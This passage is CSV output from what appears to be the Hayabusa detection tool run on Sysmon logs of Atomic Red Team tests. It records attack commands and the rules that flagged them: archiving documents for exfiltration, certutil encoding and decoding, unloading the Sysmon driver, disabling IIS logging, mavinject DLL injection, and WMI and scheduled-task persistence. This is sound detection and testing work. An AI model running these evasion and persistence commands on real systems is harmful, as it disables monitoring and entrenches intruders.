MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4944 | PGUID: 747F3D96-D989-5D31-0000-0010FC7B3900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:16.782 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""rar a -r exfilthis.rar *.docx"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2000 | PGUID: 747F3D96-D998-5D31-0000-001008B43900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:16.830 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2424 | PGUID: 747F3D96-D998-5D31-0000-00101BB73900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:57.044 +00:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:54:58.819 +00:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:02.378 +00:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:02.806 +00:00,MSEDGEWIN10,21,info,,WMI Event Consumer To Filter Activity,"Deleted | Consumer: ""\\\\.\\ROOT\\subscription:CommandLineEventConsumer.Name=\""AtomicRedTeam-WMIPersistence-Example\"""" | Filter: ""\\\\.\\ROOT\\subscription:__EventFilter.Name=\""AtomicRedTeam-WMIPersistence-Example\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:02.895 +00:00,MSEDGEWIN10,20,info,,WMI Event Consumer Activity,"Deleted | Type: Command Line | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Dst: ""C:\\Windows\\System32\\notepad.exe"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:02.977 +00:00,MSEDGEWIN10,19,info,,WMI Event Filter Activity,"Deleted | Namespace: ""root\\CimV2"" | Name: ""AtomicRedTeam-WMIPersistence-Example"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 325"" | User: MSEDGEWIN10\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.235 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4832 | PGUID: 747F3D96-DA3F-5D31-0000-00104C173C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.235 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.309 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -encode c:\file.exe file.txt | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -encode c:\file.exe file.txt"" | LID: 0x50951 | PID: 1260 | PGUID: 747F3D96-DA3F-5D31-0000-00109E193C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.309 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.961 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4020 | PGUID: 747F3D96-DA3F-5D31-0000-0010562E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.961 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.974 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: certutil.exe -decode file.txt c:\file.exe | Process: C:\Windows\System32\certutil.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""certutil.exe -decode file.txt c:\file.exe"" | LID: 0x50951 | PID: 6888 | PGUID: 747F3D96-DA3F-5D31-0000-001022323C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:03.974 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.210 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 7140 | PGUID: 747F3D96-DA3F-5D31-0000-0010813E3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.270 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %%windir%%\\system32\\certutil.exe %%temp%%tcm.tmp"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6572 | PGUID: 747F3D96-DA40-5D31-0000-00106A543C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.270 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.294 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c copy C:\Windows\\system32\\certutil.exe C:\Users\IEUser\AppData\Local\Temptcm.tmp | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c copy %windir%\\system32\\certutil.exe %temp%tcm.tmp"" | LID: 0x50951 | PID: 5168 | PGUID: 747F3D96-DA40-5D31-0000-0010B1553C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.294 +00:00,MSEDGEWIN10,1,medium,Evas,Suspicious Copy From or To System32,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_copy_system32.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.333 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %%temp%%tcm.tmp -decode c:\file.exe file.txt"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4336 | PGUID: 747F3D96-DA40-5D31-0000-0010CF5A3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.333 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.361 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""cmd.exe /c %temp%tcm.tmp -decode c:\file.exe file.txt"" | LID: 0x50951 | PID: 3932 | PGUID: 747F3D96-DA40-5D31-0000-0010565D3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.361 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.412 +00:00,MSEDGEWIN10,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00 | Hash: SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.412 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd.exe /c C:\Users\IEUser\AppData\Local\Temptcm.tmp -decode c:\file.exe file.txt | LID: 0x50951 | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.412 +00:00,MSEDGEWIN10,1,high,Evas | C2,Suspicious Certutil Command,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_certutil_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.600 +00:00,MSEDGEWIN10,5,info,,Process Terminated,Process: C:\Users\IEUser\AppData\Local\Temptcm.tmp | PID: 6260 | PGUID: 747F3D96-DA40-5D31-0000-0010AB5F3C00,rules/hayabusa/sysmon/events/5_ProcessTerminated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:04.643 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 264 | PGUID: 747F3D96-DA40-5D31-0000-0010E16B3C00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:14.715 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""fltmc.exe unload SysmonDrv"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3976 | PGUID: 747F3D96-DA4A-5D31-0000-0010C21F3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:14.758 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 1012 | PGUID: 747F3D96-DA4A-5D31-0000-0010EE223D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:14.944 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""C:\Windows\System32\inetsrv\appcmd.exe set config "" ""Default /section:httplogging /dontLog:true"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4056 | PGUID: 747F3D96-DA4A-5D31-0000-00106C293D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:14.991 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2584 | PGUID: 747F3D96-DA4A-5D31-0000-00107A2C3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:15.776 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\mavinject.exe"" 3912 /INJECTRUNNING C:\AtomicRedTeam\atomics\T1055\src\x64\T1055.dll | Process: C:\Windows\System32\mavinject.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2604 | PGUID: 747F3D96-DA4B-5D31-0000-0010CB413D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:15.776 +00:00,MSEDGEWIN10,1,critical,,MavInject Process Injection,,rules/sigma/process_creation_sysmon/proc_creation_win_mavinject_proc_inj.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:16.496 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c .\bin\T1055.exe | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 2596 | PGUID: 747F3D96-DA4C-5D31-0000-0010655D3D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:16.552 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 6172 | PGUID: 747F3D96-DA4C-5D31-0000-001077603D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:44.283 +00:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 3536 | PGUID: 747F3D96-DA68-5D31-0000-001025713E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.073 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5036 | PGUID: 747F3D96-DA6A-5D31-0000-0010B2953E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.094 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management AT | Cmd: at 13:20 /interactive cmd | Process: C:\Windows\System32\at.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""at 13:20 /interactive cmd"" | LID: 0x50951 | PID: 3864 | PGUID: 747F3D96-DA6A-5D31-0000-001004983E00 | Hash: SHA1=EC6F04AA61D8F0FA0945EBFC58F6CC7CEBB1377A,MD5=F4416891D11BBA6975E5067FA10507C8,SHA256=73A9A6A4C9CF19FCD117EB3C430E1C9ACADED31B42875BA4F02FA61DA1B8A6DC,IMPHASH=FA9A9B0D471E4B5F3683C346C3D880BD",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.094 +00:00,MSEDGEWIN10,1,high,PrivEsc,Interactive AT Job,,rules/sigma/process_creation_sysmon/proc_creation_win_interactive_at.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.207 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3224 | PGUID: 747F3D96-DA6A-5D31-0000-0010C09D3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.422 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4276 | PGUID: 747F3D96-DA6A-5D31-0000-001072A63E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.459 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /SC ONCE /TN spawn /TR C:\windows\system32\cmd.exe /ST 20:10"" | LID: 0x50951 | PID: 1408 | PGUID: 747F3D96-DA6A-5D31-0000-0010C4A83E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.459 +00:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.608 +00:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\Tasks\spawn | Process: C:\Windows\system32\svchost.exe | PID: 1108 | PGUID: 747F3D96-D4A5-5D31-0000-001037D40000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.640 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 4552 | PGUID: 747F3D96-DA6A-5D31-0000-001025AD3E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.828 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 3872 | PGUID: 747F3D96-DA6A-5D31-0000-001074C23E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.849 +00:00,MSEDGEWIN10,1,high,,Process Created_Sysmon Alert,"Persistence - Scheduled Task Management | Cmd: SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10 | Process: C:\Windows\System32\schtasks.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" /c ""SCHTASKS /Create /S localhost /RU DOMAIN\user /RP At0micStrong /TN "" Atomic ""task /TR C:\windows\system32\cmd.exe /SC daily /ST 20:10"" | LID: 0x50951 | PID: 3352 | PGUID: 747F3D96-DA6A-5D31-0000-0010C5C43E00 | Hash: SHA1=112C8FFA1C0934ACAAD2C58B3C7E81F3FB8E4A2C,MD5=3F9FD6D3B3E96B8F576DB72035DB38A7,SHA256=D6BA2CD73799477C051D9D864C47FCF5108064CDE07D3565871AFA10FC548086,IMPHASH=7EE4BC5589713B3470B8A950256E2E69",rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.849 +00:00,MSEDGEWIN10,1,low,Exec | Persis | PrivEsc,Scheduled Task Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_schtask_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:46.927 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 888 | PGUID: 747F3D96-DA6A-5D31-0000-00104BC83E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:47.218 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" /c ""pcalua.exe -a -c"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: powershell | LID: 0x50951 | PID: 5332 | PGUID: 747F3D96-DA6B-5D31-0000-0010CCD03E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/PanacheSysmon_vs_AtomicRedTeam01.evtx +2019-07-19 14:57:47.238 +00:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: pcalua.exe -a -c | Process: 